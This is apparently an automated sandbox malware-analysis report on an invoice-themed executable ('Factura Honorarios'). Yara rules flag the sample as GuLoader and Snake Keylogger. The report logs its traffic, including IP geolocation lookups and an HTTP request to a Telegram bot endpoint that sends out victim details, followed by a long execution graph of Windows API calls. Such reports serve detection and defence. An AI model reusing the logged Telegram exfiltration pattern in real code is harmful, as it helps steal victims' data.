                                                                                                                                Last-Modified: Mon, 18 Nov 2024 02:55:17 GMT
                                                                                                                                Accept-Ranges: bytes
                                                                                                                                Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=Hf8YU3IqrQfci%2BMoncWnMGp3VS0NcWIDxBK77%2BKDNEVFG4d3ru8yll6sTyKmPg08gLhnhFNh1jeGCVhdcypC4mU216HFHxxb%2FVqqa2wQCanxHNuvUZJqKlJywit1ws5CwHM%2FskxZ"}],"group":"cf-nel","max_age":604800}
                                                                                                                                NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                                                Server: cloudflare
                                                                                                                                CF-RAY: 8e4816f85fb4e556-DFW
                                                                                                                                alt-svc: h3=":443"; ma=86400
                                                                                                                                server-timing: cfL4;desc="?proto=TCP&rtt=1104&sent=4&recv=6&lost=0&retrans=0&sent_bytes=2849&recv_bytes=701&delivery_rate=2170914&cwnd=251&unsent_bytes=0&cid=95a455ed45cd1e27&ts=145&x=0"
2024-11-18 12:51:03 UTC | 358 | IN | Data Ascii: <Response><IP>155.94.241.187</IP><CountryCode>US</CountryCode><CountryName>United States</CountryName><RegionCode>TX</RegionCode><RegionName>Texas</RegionName><City>Dallas</City><ZipCode>75247</ZipCode><TimeZone>America/Chicago</TimeZone>


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
6 | 192.168.2.8 | 49721 | 188.114.97.3 | 443 | 7628 | C:\Users\user\Desktop\Factura Honorarios 2024-11-17.exe
Timestamp | Bytes transferred | Direction | Data
2024-11-18 12:51:05 UTC | 87 | OUT | GET /xml/155.94.241.187 HTTP/1.1
                                                                                                                                Host: reallyfreegeoip.org
                                                                                                                                Connection: Keep-Alive
2024-11-18 12:51:05 UTC | 854 | IN | HTTP/1.1 200 OK
                                                                                                                                Date: Mon, 18 Nov 2024 12:51:05 GMT
                                                                                                                                Content-Type: text/xml
                                                                                                                                Content-Length: 358
                                                                                                                                Connection: close
                                                                                                                                Cache-Control: max-age=31536000
                                                                                                                                CF-Cache-Status: HIT
                                                                                                                                Age: 35748
                                                                                                                                Last-Modified: Mon, 18 Nov 2024 02:55:17 GMT
                                                                                                                                Accept-Ranges: bytes
                                                                                                                                Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=If3ux9pifP%2BLTsJnKVDN7wjDq%2BBydgHO%2BE5M7qdz3MVjgv%2Bmix%2BiwewnQEadpyCKNIM0JclRz5RLjZNcpY081a1Su35EX3R7Z0tuuhOkoDt2eIO6i1NTEVUSchRLvuaRFMLJBD3p"}],"group":"cf-nel","max_age":604800}
                                                                                                                                NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                                                Server: cloudflare
                                                                                                                                CF-RAY: 8e481708bc7545ff-DFW
                                                                                                                                alt-svc: h3=":443"; ma=86400
                                                                                                                                server-timing: cfL4;desc="?proto=TCP&rtt=1030&sent=4&recv=6&lost=0&retrans=0&sent_bytes=2849&recv_bytes=701&delivery_rate=2732075&cwnd=251&unsent_bytes=0&cid=7ac8d3582355bc39&ts=150&x=0"
2024-11-18 12:51:05 UTC | 358 | IN
                                                                                                                                Data Ascii: <Response><IP>155.94.241.187</IP><CountryCode>US</CountryCode><CountryName>United States</CountryName><RegionCode>TX</RegionCode><RegionName>Texas</RegionName><City>Dallas</City><ZipCode>75247</ZipCode><TimeZone>America/Chicago</TimeZone>


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
7 | 192.168.2.8 | 49723 | 188.114.97.3 | 443 | 7628 | C:\Users\user\Desktop\Factura Honorarios 2024-11-17.exe
Timestamp | Bytes transferred | Direction | Data
2024-11-18 12:51:07 UTC | 87 | OUT | GET /xml/155.94.241.187 HTTP/1.1
Host: reallyfreegeoip.org
Connection: Keep-Alive
2024-11-18 12:51:07 UTC | 848 | IN | HTTP/1.1 200 OK
                                                                                                                                Date: Mon, 18 Nov 2024 12:51:07 GMT
                                                                                                                                Content-Type: text/xml
                                                                                                                                Content-Length: 358
                                                                                                                                Connection: close
                                                                                                                                Cache-Control: max-age=31536000
                                                                                                                                CF-Cache-Status: HIT
                                                                                                                                Age: 35750
                                                                                                                                Last-Modified: Mon, 18 Nov 2024 02:55:17 GMT
                                                                                                                                Accept-Ranges: bytes
                                                                                                                                Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=Ouz64boghTa944r8eit6tT48iW4qwjbCSBYWdDS0IRvuPyNPDDo7Rym6EDaJjUWiHejxvag0ALWSaHr%2BRvWMkmITu9oCdi1PEaP5ATLRiM%2BynREbqyqLbecs2ySNyQvBbmPjUHBm"}],"group":"cf-nel","max_age":604800}
                                                                                                                                NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                                                Server: cloudflare
                                                                                                                                CF-RAY: 8e481712db4545f3-DFW
                                                                                                                                alt-svc: h3=":443"; ma=86400
                                                                                                                                server-timing: cfL4;desc="?proto=TCP&rtt=1768&sent=4&recv=6&lost=0&retrans=0&sent_bytes=2849&recv_bytes=701&delivery_rate=1597352&cwnd=249&unsent_bytes=0&cid=d0909560d1d3e40d&ts=150&x=0"
2024-11-18 12:51:07 UTC | 358 | IN
                                                                                                                                Data Ascii: <Response><IP>155.94.241.187</IP><CountryCode>US</CountryCode><CountryName>United States</CountryName><RegionCode>TX</RegionCode><RegionName>Texas</RegionName><City>Dallas</City><ZipCode>75247</ZipCode><TimeZone>America/Chicago</TimeZone>


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
8 | 192.168.2.8 | 49725 | 188.114.97.3 | 443 | 7628 | C:\Users\user\Desktop\Factura Honorarios 2024-11-17.exe
Timestamp | Bytes transferred | Direction | Data
2024-11-18 12:51:09 UTC | 87 | OUT | GET /xml/155.94.241.187 HTTP/1.1
Host: reallyfreegeoip.org
Connection: Keep-Alive
2024-11-18 12:51:10 UTC | 850 | IN | HTTP/1.1 200 OK
                                                                                                                                Date: Mon, 18 Nov 2024 12:51:09 GMT
                                                                                                                                Content-Type: text/xml
                                                                                                                                Content-Length: 358
                                                                                                                                Connection: close
                                                                                                                                Cache-Control: max-age=31536000
                                                                                                                                CF-Cache-Status: HIT
                                                                                                                                Age: 35752
                                                                                                                                Last-Modified: Mon, 18 Nov 2024 02:55:17 GMT
                                                                                                                                Accept-Ranges: bytes
                                                                                                                                Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=JB9aeWv6BbhvQQlVq5HAIpUA1vqoVrJgpOfGSfscsLsrx2202az1JE3iArp9rpKI6W7bW7kT8My9Kh5lBdH8dQrTS1G1SjfM3BR%2Fq9noM8i6u4fvnzctdIPgfVA3u6%2FtQ%2BMnISev"}],"group":"cf-nel","max_age":604800}
                                                                                                                                NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                                                Server: cloudflare
                                                                                                                                CF-RAY: 8e4817231efb6c69-DFW
                                                                                                                                alt-svc: h3=":443"; ma=86400
                                                                                                                                server-timing: cfL4;desc="?proto=TCP&rtt=1188&sent=4&recv=6&lost=0&retrans=0&sent_bytes=2850&recv_bytes=701&delivery_rate=2393388&cwnd=251&unsent_bytes=0&cid=54a4a3c12a15f1ab&ts=146&x=0"
2024-11-18 12:51:10 UTC | 358 | IN
                                                                                                                                Data Ascii: <Response><IP>155.94.241.187</IP><CountryCode>US</CountryCode><CountryName>United States</CountryName><RegionCode>TX</RegionCode><RegionName>Texas</RegionName><City>Dallas</City><ZipCode>75247</ZipCode><TimeZone>America/Chicago</TimeZone>


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
9 | 192.168.2.8 | 49727 | 188.114.97.3 | 443 | 7628 | C:\Users\user\Desktop\Factura Honorarios 2024-11-17.exe
Timestamp | Bytes transferred | Direction | Data
2024-11-18 12:51:11 UTC | 87 | OUT | GET /xml/155.94.241.187 HTTP/1.1
Host: reallyfreegeoip.org
Connection: Keep-Alive
2024-11-18 12:51:11 UTC | 858 | IN | HTTP/1.1 200 OK
                                                                                                                                Date: Mon, 18 Nov 2024 12:51:11 GMT
                                                                                                                                Content-Type: text/xml
                                                                                                                                Content-Length: 358
                                                                                                                                Connection: close
                                                                                                                                Cache-Control: max-age=31536000
                                                                                                                                CF-Cache-Status: HIT
                                                                                                                                Age: 35754
                                                                                                                                Last-Modified: Mon, 18 Nov 2024 02:55:17 GMT
                                                                                                                                Accept-Ranges: bytes
                                                                                                                                Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=kd4VLP%2Bqhfys8BlLqa4XQMifeGXMaB2ABL%2FSi2PJLUirePbuTNMACDExae%2BsQPw%2F5O2X%2BJ4sx4hJIiSZJPrJv0XLTD7atP6sd7dcL%2FUldWlMGmohKPijlt%2FFdPRjerw1tow1MizR"}],"group":"cf-nel","max_age":604800}
                                                                                                                                NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                                                Server: cloudflare
                                                                                                                                CF-RAY: 8e48172d2dda2e5a-DFW
                                                                                                                                alt-svc: h3=":443"; ma=86400
                                                                                                                                server-timing: cfL4;desc="?proto=TCP&rtt=1084&sent=4&recv=6&lost=0&retrans=0&sent_bytes=2848&recv_bytes=701&delivery_rate=2649588&cwnd=251&unsent_bytes=0&cid=d14ab14c703f5422&ts=151&x=0"
2024-11-18 12:51:11 UTC | 358 | IN
                                                                                                                                Data Ascii: <Response><IP>155.94.241.187</IP><CountryCode>US</CountryCode><CountryName>United States</CountryName><RegionCode>TX</RegionCode><RegionName>Texas</RegionName><City>Dallas</City><ZipCode>75247</ZipCode><TimeZone>America/Chicago</TimeZone>


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
10 | 192.168.2.8 | 49729 | 188.114.97.3 | 443 | 7628 | C:\Users\user\Desktop\Factura Honorarios 2024-11-17.exe
Timestamp | Bytes transferred | Direction | Data
2024-11-18 12:51:13 UTC | 63 | OUT | GET /xml/155.94.241.187 HTTP/1.1
Host: reallyfreegeoip.org
2024-11-18 12:51:13 UTC | 852 | IN | HTTP/1.1 200 OK
                                                                                                                                Date: Mon, 18 Nov 2024 12:51:13 GMT
                                                                                                                                Content-Type: text/xml
                                                                                                                                Content-Length: 358
                                                                                                                                Connection: close
                                                                                                                                Cache-Control: max-age=31536000
                                                                                                                                CF-Cache-Status: HIT
                                                                                                                                Age: 35756
                                                                                                                                Last-Modified: Mon, 18 Nov 2024 02:55:17 GMT
                                                                                                                                Accept-Ranges: bytes
                                                                                                                                Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=hQL%2F346jgBdcuPvOQtTy5M7T4LOBc7DtQ7jlXVKjpf%2FLUmcq7JPpwHcXytz9Tx9xr2bla74hZaSY3j8G%2B%2BGs8lQG93Ey3iHq0PqxE5nTwQYdK5IfgnGAvptypQky6tCSVc0rzfrc"}],"group":"cf-nel","max_age":604800}
                                                                                                                                NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                                                Server: cloudflare
                                                                                                                                CF-RAY: 8e481738ab7247ab-DFW
                                                                                                                                alt-svc: h3=":443"; ma=86400
                                                                                                                                server-timing: cfL4;desc="?proto=TCP&rtt=1117&sent=4&recv=6&lost=0&retrans=0&sent_bytes=2849&recv_bytes=701&delivery_rate=2642335&cwnd=251&unsent_bytes=0&cid=44b415538649552e&ts=160&x=0"
2024-11-18 12:51:13 UTC | 358 | IN
                                                                                                                                Data Ascii: <Response><IP>155.94.241.187</IP><CountryCode>US</CountryCode><CountryName>United States</CountryName><RegionCode>TX</RegionCode><RegionName>Texas</RegionName><City>Dallas</City><ZipCode>75247</ZipCode><TimeZone>America/Chicago</TimeZone>


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
11 | 192.168.2.8 | 49730 | 149.154.167.220 | 443 | 7628 | C:\Users\user\Desktop\Factura Honorarios 2024-11-17.exe
Timestamp | Bytes transferred | Direction | Data
2024-11-18 12:51:14 UTC | 349 | OUT | GET /bot/sendMessage?chat_id=&text=%20%0D%0A%0D%0APC%20Name:128757%0D%0ADate%20and%20Time:%2019/11/2024%20/%2002:39:03%0D%0ACountry%20Name:%20United%20States%0D%0A%5B%20128757%20Clicked%20on%20the%20File%20If%20you%20see%20nothing%20this's%20mean%20the%20system%20storage's%20empty.%20%5D HTTP/1.1
Host: api.telegram.org
Connection: Keep-Alive
2024-11-18 12:51:14 UTC | 344 | IN | HTTP/1.1 404 Not Found
                                                                                                                                Server: nginx/1.18.0
                                                                                                                                Date: Mon, 18 Nov 2024 12:51:14 GMT
                                                                                                                                Content-Type: application/json
                                                                                                                                Content-Length: 55
                                                                                                                                Connection: close
                                                                                                                                Strict-Transport-Security: max-age=31536000; includeSubDomains; preload
                                                                                                                                Access-Control-Allow-Origin: *
                                                                                                                                Access-Control-Expose-Headers: Content-Length,Content-Type,Date,Server,Connection
2024-11-18 12:51:14 UTC | 55 | IN
                                                                                                                                Data Ascii: {"ok":false,"error_code":404,"description":"Not Found"}


Target ID: 0
Start time: 07:49:32
Start date: 18/11/2024
Path: C:\Users\user\Desktop\Factura Honorarios 2024-11-17.exe
Wow64 process (32bit): true
Commandline: "C:\Users\user\Desktop\Factura Honorarios 2024-11-17.exe"
Imagebase: 0x400000
File size: 701'493 bytes
MD5 hash: 2494D7B2FD14DC5604FD6AA412F170FC
Has elevated privileges: true
Has administrator privileges: true
Programmed in: C, C++ or other language
Yara matches:
• Rule: JoeSecurity_GuLoader_2, Description: Yara detected GuLoader, Source: 00000000.00000002.1873262256.0000000006B16000.00000040.00001000.00020000.00000000.sdmp, Author: Joe Security
Reputation: low
Has exited: true

Target ID:3
Start time:07:50:18
Start date:18/11/2024
Path:C:\Users\user\Desktop\Factura Honorarios 2024-11-17.exe
Wow64 process (32bit):true
Commandline:"C:\Users\user\Desktop\Factura Honorarios 2024-11-17.exe"
Imagebase:0x400000
File size:701'493 bytes
MD5 hash:2494D7B2FD14DC5604FD6AA412F170FC
Has elevated privileges:true
Has administrator privileges:true
Programmed in:C, C++ or other language
Yara matches:
• Rule: JoeSecurity_SnakeKeylogger, Description: Yara detected Snake Keylogger, Source: 00000003.00000002.2683988576.0000000035F51000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
Reputation:low
Has exited:false

Execution Graph

Execution Coverage:17.6%
Dynamic/Decrypted Code Coverage:0%
Signature Coverage:19.6%
Total number of Nodes:1572
Total number of Limit Nodes:35
401a28 lstrcmpW 5626->5628 5629 401a1c 5627->5629 5628->5629 5630 401000 5631 401037 BeginPaint GetClientRect 5630->5631 5632 40100c DefWindowProcW 5630->5632 5634 4010f3 5631->5634 5635 401179 5632->5635 5636 401073 CreateBrushIndirect FillRect DeleteObject 5634->5636 5637 4010fc 5634->5637 5636->5634 5638 401102 CreateFontIndirectW 5637->5638 5639 401167 EndPaint 5637->5639 5638->5639 5640 401112 6 API calls 5638->5640 5639->5635 5640->5639 5648 401503 5649 40150b 5648->5649 5650 40151e 5648->5650 5651 402c1f 17 API calls 5649->5651 5651->5650 5652 402104 5653 402c41 17 API calls 5652->5653 5654 40210b 5653->5654 5655 402c41 17 API calls 5654->5655 5656 402115 5655->5656 5657 402c41 17 API calls 5656->5657 5658 40211f 5657->5658 5659 402c41 17 API calls 5658->5659 5660 402129 5659->5660 5661 402c41 17 API calls 5660->5661 5662 402133 5661->5662 5663 402172 CoCreateInstance 5662->5663 5664 402c41 17 API calls 5662->5664 5667 402191 5663->5667 5664->5663 5665 401423 24 API calls 5666 402250 5665->5666 5667->5665 5667->5666 5668 402484 5669 402c81 17 API calls 5668->5669 5670 40248e 5669->5670 5671 402c41 17 API calls 5670->5671 5672 402497 5671->5672 5673 4024a2 RegQueryValueExW 5672->5673 5677 40288b 5672->5677 5674 4024c8 RegCloseKey 5673->5674 5675 4024c2 5673->5675 5674->5677 5675->5674 5679 4061cb wsprintfW 5675->5679 5679->5674 5680 401f06 5681 402c41 17 API calls 5680->5681 5682 401f0c 5681->5682 5683 4052ec 24 API calls 5682->5683 5684 401f16 5683->5684 5685 40586d 2 API calls 5684->5685 5686 401f1c 5685->5686 5687 401f3f CloseHandle 5686->5687 5689 40670f 5 API calls 5686->5689 5690 40288b 5686->5690 5687->5690 5691 401f31 5689->5691 5691->5687 5693 4061cb wsprintfW 5691->5693 5693->5687 5694 6ff4103d 5697 6ff4101b 5694->5697 5698 6ff41516 GlobalFree 5697->5698 5699 6ff41020 5698->5699 5700 6ff41024 5699->5700 5701 6ff41027 GlobalAlloc 5699->5701 5702 6ff4153d 3 API calls 5700->5702 5701->5700 5703 6ff4103b 5702->5703 4558 40230c 4559 402314 4558->4559 
4560 40231a 4558->4560 4561 402c41 17 API calls 4559->4561 4562 402c41 17 API calls 4560->4562 4564 402328 4560->4564 4561->4560 4562->4564 4563 402336 4566 402c41 17 API calls 4563->4566 4564->4563 4565 402c41 17 API calls 4564->4565 4565->4563 4567 40233f WritePrivateProfileStringW 4566->4567 5704 40190c 5705 401943 5704->5705 5706 402c41 17 API calls 5705->5706 5707 401948 5706->5707 5708 405996 67 API calls 5707->5708 5709 401951 5708->5709 5710 401f8c 5711 402c41 17 API calls 5710->5711 5712 401f93 5711->5712 5713 40665e 5 API calls 5712->5713 5714 401fa2 5713->5714 5715 401fbe GlobalAlloc 5714->5715 5717 402026 5714->5717 5716 401fd2 5715->5716 5715->5717 5718 40665e 5 API calls 5716->5718 5719 401fd9 5718->5719 5720 40665e 5 API calls 5719->5720 5721 401fe3 5720->5721 5721->5717 5725 4061cb wsprintfW 5721->5725 5723 402018 5726 4061cb wsprintfW 5723->5726 5725->5723 5726->5717 5727 40238e 5728 4023c1 5727->5728 5729 402396 5727->5729 5730 402c41 17 API calls 5728->5730 5731 402c81 17 API calls 5729->5731 5732 4023c8 5730->5732 5734 40239d 5731->5734 5738 402cff 5732->5738 5735 402c41 17 API calls 5734->5735 5736 4023d5 5734->5736 5737 4023ae RegDeleteValueW RegCloseKey 5735->5737 5737->5736 5739 402d13 5738->5739 5741 402d0c 5738->5741 5739->5741 5742 402d44 5739->5742 5741->5736 5743 4060f1 RegOpenKeyExW 5742->5743 5746 402d72 5743->5746 5744 402dc3 5744->5741 5745 402d98 RegEnumKeyW 5745->5746 5747 402daf RegCloseKey 5745->5747 5746->5744 5746->5745 5746->5747 5748 402dd0 RegCloseKey 5746->5748 5750 402d44 6 API calls 5746->5750 5749 40665e 5 API calls 5747->5749 5748->5744 5751 402dbf 5749->5751 5750->5746 5751->5744 5752 402de0 RegDeleteKeyW 5751->5752 5752->5744 5753 40698e 5754 406812 5753->5754 5755 40717d 5754->5755 5756 406893 GlobalFree 5754->5756 5757 40689c GlobalAlloc 5754->5757 5758 406913 GlobalAlloc 5754->5758 5759 40690a GlobalFree 5754->5759 5756->5757 5757->5754 5757->5755 5758->5754 5758->5755 5759->5758 5760 40190f 5761 402c41 17 API 
calls 5760->5761 5762 401916 5761->5762 5763 4058ea MessageBoxIndirectW 5762->5763 5764 40191f 5763->5764 5765 401491 5766 4052ec 24 API calls 5765->5766 5767 401498 5766->5767 5768 401d14 5769 402c1f 17 API calls 5768->5769 5770 401d1b 5769->5770 5771 402c1f 17 API calls 5770->5771 5772 401d27 GetDlgItem 5771->5772 5773 402592 5772->5773 5781 402598 5782 4025c7 5781->5782 5783 4025ac 5781->5783 5785 4025fb 5782->5785 5786 4025cc 5782->5786 5784 402c1f 17 API calls 5783->5784 5788 4025b3 5784->5788 5787 402c41 17 API calls 5785->5787 5789 402c41 17 API calls 5786->5789 5791 402602 lstrlenW 5787->5791 5792 402645 5788->5792 5793 40262f 5788->5793 5795 405e5b 5 API calls 5788->5795 5790 4025d3 WideCharToMultiByte lstrlenA 5789->5790 5790->5788 5791->5788 5793->5792 5794 405e2c WriteFile 5793->5794 5794->5792 5795->5793 5796 40149e 5797 4022f7 5796->5797 5798 4014ac PostQuitMessage 5796->5798 5798->5797 5799 401c1f 5800 402c1f 17 API calls 5799->5800 5801 401c26 5800->5801 5802 402c1f 17 API calls 5801->5802 5803 401c33 5802->5803 5804 401c48 5803->5804 5805 402c41 17 API calls 5803->5805 5806 402c41 17 API calls 5804->5806 5811 401c58 5804->5811 5805->5804 5806->5811 5807 401c63 5809 402c1f 17 API calls 5807->5809 5808 401caf 5810 402c41 17 API calls 5808->5810 5812 401c68 5809->5812 5813 401cb4 5810->5813 5811->5807 5811->5808 5814 402c1f 17 API calls 5812->5814 5815 402c41 17 API calls 5813->5815 5816 401c74 5814->5816 5817 401cbd FindWindowExW 5815->5817 5818 401c81 SendMessageTimeoutW 5816->5818 5819 401c9f SendMessageW 5816->5819 5820 401cdf 5817->5820 5818->5820 5819->5820 5821 402aa0 SendMessageW 5822 402ac5 5821->5822 5823 402aba InvalidateRect 5821->5823 5823->5822 5824 402821 5825 402827 5824->5825 5826 402ac5 5825->5826 5827 40282f FindClose 5825->5827 5827->5826 4381 403d22 4382 403e75 4381->4382 4383 403d3a 4381->4383 4384 403e86 GetDlgItem GetDlgItem 4382->4384 4393 403ec6 4382->4393 4383->4382 4385 403d46 4383->4385 4386 4041fb 18 API calls 4384->4386 
4388 403d51 SetWindowPos 4385->4388 4389 403d64 4385->4389 4392 403eb0 SetClassLongW 4386->4392 4387 403f20 4399 403e70 4387->4399 4452 404247 4387->4452 4388->4389 4390 403d81 4389->4390 4391 403d69 ShowWindow 4389->4391 4395 403da3 4390->4395 4396 403d89 DestroyWindow 4390->4396 4391->4390 4397 40140b 2 API calls 4392->4397 4393->4387 4398 401389 2 API calls 4393->4398 4401 403da8 SetWindowLongW 4395->4401 4402 403db9 4395->4402 4400 404184 4396->4400 4397->4393 4403 403ef8 4398->4403 4400->4399 4409 4041b5 ShowWindow 4400->4409 4401->4399 4406 403e62 4402->4406 4407 403dc5 GetDlgItem 4402->4407 4403->4387 4408 403efc SendMessageW 4403->4408 4404 40140b 2 API calls 4422 403f32 4404->4422 4405 404186 DestroyWindow EndDialog 4405->4400 4474 404262 4406->4474 4410 403df5 4407->4410 4411 403dd8 SendMessageW IsWindowEnabled 4407->4411 4408->4399 4409->4399 4414 403e02 4410->4414 4417 403e49 SendMessageW 4410->4417 4418 403e15 4410->4418 4425 403dfa 4410->4425 4411->4399 4411->4410 4413 4062a6 17 API calls 4413->4422 4414->4417 4414->4425 4416 4041fb 18 API calls 4416->4422 4417->4406 4419 403e32 4418->4419 4420 403e1d 4418->4420 4424 40140b 2 API calls 4419->4424 4468 40140b 4420->4468 4421 403e30 4421->4406 4422->4399 4422->4404 4422->4405 4422->4413 4422->4416 4443 4040c6 DestroyWindow 4422->4443 4455 4041fb 4422->4455 4426 403e39 4424->4426 4471 4041d4 4425->4471 4426->4406 4426->4425 4428 403fad GetDlgItem 4429 403fc2 4428->4429 4430 403fca ShowWindow KiUserCallbackDispatcher 4428->4430 4429->4430 4458 40421d KiUserCallbackDispatcher 4430->4458 4432 403ff4 EnableWindow 4437 404008 4432->4437 4433 40400d GetSystemMenu EnableMenuItem SendMessageW 4434 40403d SendMessageW 4433->4434 4433->4437 4434->4437 4437->4433 4459 404230 SendMessageW 4437->4459 4460 403d03 4437->4460 4463 406284 lstrcpynW 4437->4463 4439 40406c lstrlenW 4440 4062a6 17 API calls 4439->4440 4441 404082 SetWindowTextW 4440->4441 4464 401389 4441->4464 4443->4400 4444 4040e0 CreateDialogParamW 
4443->4444 4444->4400 4445 404113 4444->4445 4446 4041fb 18 API calls 4445->4446 4447 40411e GetDlgItem GetWindowRect ScreenToClient SetWindowPos 4446->4447 4448 401389 2 API calls 4447->4448 4449 404164 4448->4449 4449->4399 4450 40416c ShowWindow 4449->4450 4451 404247 SendMessageW 4450->4451 4451->4400 4453 404250 SendMessageW 4452->4453 4454 40425f 4452->4454 4453->4454 4454->4422 4456 4062a6 17 API calls 4455->4456 4457 404206 SetDlgItemTextW 4456->4457 4457->4428 4458->4432 4459->4437 4461 4062a6 17 API calls 4460->4461 4462 403d11 SetWindowTextW 4461->4462 4462->4437 4463->4439 4465 401390 4464->4465 4466 4013fe 4465->4466 4467 4013cb MulDiv SendMessageW 4465->4467 4466->4422 4467->4465 4469 401389 2 API calls 4468->4469 4470 401420 4469->4470 4470->4425 4472 4041e1 SendMessageW 4471->4472 4473 4041db 4471->4473 4472->4421 4473->4472 4475 404325 4474->4475 4476 40427a GetWindowLongW 4474->4476 4475->4399 4476->4475 4477 40428f 4476->4477 4477->4475 4478 4042bc GetSysColor 4477->4478 4479 4042bf 4477->4479 4478->4479 4480 4042c5 SetTextColor 4479->4480 4481 4042cf SetBkMode 4479->4481 4480->4481 4482 4042e7 GetSysColor 4481->4482 4483 4042ed 4481->4483 4482->4483 4484 4042f4 SetBkColor 4483->4484 4485 4042fe 4483->4485 4484->4485 4485->4475 4486 404311 DeleteObject 4485->4486 4487 404318 CreateBrushIndirect 4485->4487 4486->4487 4487->4475 4488 6ff42997 4489 6ff429e7 4488->4489 4490 6ff429a7 VirtualProtect 4488->4490 4490->4489 5828 4015a3 5829 402c41 17 API calls 5828->5829 5830 4015aa SetFileAttributesW 5829->5830 5831 4015bc 5830->5831 5832 4046a5 5833 4046b5 5832->5833 5834 4046db 5832->5834 5835 4041fb 18 API calls 5833->5835 5836 404262 8 API calls 5834->5836 5837 4046c2 SetDlgItemTextW 5835->5837 5838 4046e7 5836->5838 5837->5834 5839 4029a8 5840 402c1f 17 API calls 5839->5840 5841 4029ae 5840->5841 5842 4029d5 5841->5842 5843 4029ee 5841->5843 5847 40288b 5841->5847 5844 4029da 5842->5844 5852 4029eb 5842->5852 5845 402a08 5843->5845 5846 4029f8 
5843->5846 5853 406284 lstrcpynW 5844->5853 5849 4062a6 17 API calls 5845->5849 5848 402c1f 17 API calls 5846->5848 5848->5852 5849->5852 5852->5847 5854 4061cb wsprintfW 5852->5854 5853->5847 5854->5847 4502 40542b 4503 4055d5 4502->4503 4504 40544c GetDlgItem GetDlgItem GetDlgItem 4502->4504 4506 405606 4503->4506 4507 4055de GetDlgItem CreateThread CloseHandle 4503->4507 4548 404230 SendMessageW 4504->4548 4509 405631 4506->4509 4510 405656 4506->4510 4511 40561d ShowWindow ShowWindow 4506->4511 4507->4506 4551 4053bf OleInitialize 4507->4551 4508 4054bc 4518 4054c3 GetClientRect GetSystemMetrics SendMessageW SendMessageW 4508->4518 4512 405691 4509->4512 4513 40563d 4509->4513 4517 404262 8 API calls 4510->4517 4550 404230 SendMessageW 4511->4550 4512->4510 4519 40569f SendMessageW 4512->4519 4515 405645 4513->4515 4516 40566b ShowWindow 4513->4516 4520 4041d4 SendMessageW 4515->4520 4522 40568b 4516->4522 4523 40567d 4516->4523 4521 405664 4517->4521 4524 405531 4518->4524 4525 405515 SendMessageW SendMessageW 4518->4525 4519->4521 4526 4056b8 CreatePopupMenu 4519->4526 4520->4510 4530 4041d4 SendMessageW 4522->4530 4529 4052ec 24 API calls 4523->4529 4527 405544 4524->4527 4528 405536 SendMessageW 4524->4528 4525->4524 4531 4062a6 17 API calls 4526->4531 4532 4041fb 18 API calls 4527->4532 4528->4527 4529->4522 4530->4512 4533 4056c8 AppendMenuW 4531->4533 4534 405554 4532->4534 4535 4056e5 GetWindowRect 4533->4535 4536 4056f8 TrackPopupMenu 4533->4536 4537 405591 GetDlgItem SendMessageW 4534->4537 4538 40555d ShowWindow 4534->4538 4535->4536 4536->4521 4539 405713 4536->4539 4537->4521 4542 4055b8 SendMessageW SendMessageW 4537->4542 4540 405580 4538->4540 4541 405573 ShowWindow 4538->4541 4543 40572f SendMessageW 4539->4543 4549 404230 SendMessageW 4540->4549 4541->4540 4542->4521 4543->4543 4544 40574c OpenClipboard EmptyClipboard GlobalAlloc GlobalLock 4543->4544 4546 405771 SendMessageW 4544->4546 4546->4546 4547 40579a GlobalUnlock SetClipboardData 
CloseClipboard 4546->4547 4547->4521 4548->4508 4549->4537 4550->4509 4552 404247 SendMessageW 4551->4552 4553 4053e2 4552->4553 4556 401389 2 API calls 4553->4556 4557 405409 4553->4557 4554 404247 SendMessageW 4555 40541b OleUninitialize 4554->4555 4556->4553 4557->4554 5862 4028ad 5863 402c41 17 API calls 5862->5863 5865 4028bb 5863->5865 5864 4028d1 5867 405d55 2 API calls 5864->5867 5865->5864 5866 402c41 17 API calls 5865->5866 5866->5864 5868 4028d7 5867->5868 5890 405d7a GetFileAttributesW CreateFileW 5868->5890 5870 4028e4 5871 4028f0 GlobalAlloc 5870->5871 5872 402987 5870->5872 5873 402909 5871->5873 5874 40297e CloseHandle 5871->5874 5875 4029a2 5872->5875 5876 40298f DeleteFileW 5872->5876 5891 403311 SetFilePointer 5873->5891 5874->5872 5876->5875 5878 40290f 5879 4032fb ReadFile 5878->5879 5880 402918 GlobalAlloc 5879->5880 5881 402928 5880->5881 5882 40295c 5880->5882 5884 403116 35 API calls 5881->5884 5883 405e2c WriteFile 5882->5883 5885 402968 GlobalFree 5883->5885 5889 402935 5884->5889 5886 403116 35 API calls 5885->5886 5887 40297b 5886->5887 5887->5874 5888 402953 GlobalFree 5888->5882 5889->5888 5890->5870 5891->5878 5892 401a30 5893 402c41 17 API calls 5892->5893 5894 401a39 ExpandEnvironmentStringsW 5893->5894 5895 401a4d 5894->5895 5897 401a60 5894->5897 5896 401a52 lstrcmpW 5895->5896 5895->5897 5896->5897 5898 404331 lstrcpynW lstrlenW 4645 402032 4646 402044 4645->4646 4647 4020f6 4645->4647 4648 402c41 17 API calls 4646->4648 4649 401423 24 API calls 4647->4649 4650 40204b 4648->4650 4656 402250 4649->4656 4651 402c41 17 API calls 4650->4651 4652 402054 4651->4652 4653 40206a LoadLibraryExW 4652->4653 4654 40205c GetModuleHandleW 4652->4654 